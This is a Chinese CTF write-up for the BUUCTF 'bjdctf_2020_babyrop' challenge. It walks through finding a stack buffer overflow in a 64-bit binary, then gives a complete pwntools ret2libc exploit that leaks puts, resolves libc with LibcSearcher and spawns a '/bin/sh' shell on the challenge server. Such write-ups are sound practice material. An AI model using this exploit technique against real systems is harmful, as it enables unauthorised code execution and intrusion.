1.例行检查保护机制
2. 我们用64位的IDA打开该文件
shift+f12查看关键字符串,没有找到关键字字符串
3.我们进入main函数看看
发现有两个函数
init():这里打印了两句话
vuln():打印了一句话,然后我们看到read()函数里面读取了0x64个buf,但是buf只有0x20个字节,所以这里是漏洞
4.system("/bin/sh")
我们用libc计算偏移量,再计算system("/bin/sh")
base_addr = puts_addr - libc_puts_addr
system_addr = base_addr + libc_system_addr
bin_addr = base_addr + libc_bin_addr
PWN|栈溢出总结笔记_l2645470582_的博客-CSDN博客
5.EXP
#encoding = utf-8
from pwn import *
from LibcSearcher import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
content = 0
elf = ELF('./bjdctf_2020_babyrop')
def main():
if content == 1:
p = process('bjdctf_2020_babyrop')
else:
p = remote('node4.buuoj.cn',29917)
#elf
main_addr = elf.sym['main']
plt_addr = elf.plt['puts']
got_addr = elf.got['puts']
pop_rdi = 0x0400733
ret_addr = 0x04004c9
payload = b'a'*(0x20+0x8) + p64(pop_rdi) + p64(got_addr) + p64(plt_addr) + p64(main_addr)
p.recvuntil("Pull up your sword and tell me u story!\n")
p.sendline(payload)
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
#libc
lib = LibcSearcher('puts',puts_addr)
lib_puts_addr = lib.dump('puts')
lib_system_addr = lib.dump('system')
lib_bin_addr = lib.dump('str_bin_sh')
#base
base_addr = puts_addr - lib_puts_addr
system_addr = base_addr + lib_system_addr
bin_addr = base_addr + lib_bin_addr
payload = b'a'*(0x20+0x8) + p64(ret_addr) + p64(pop_rdi) + p64(bin_addr) + p64(system_addr)
p.recvuntil("Pull up your sword and tell me u story!\n")
p.sendline(payload)
p.interactive()
main()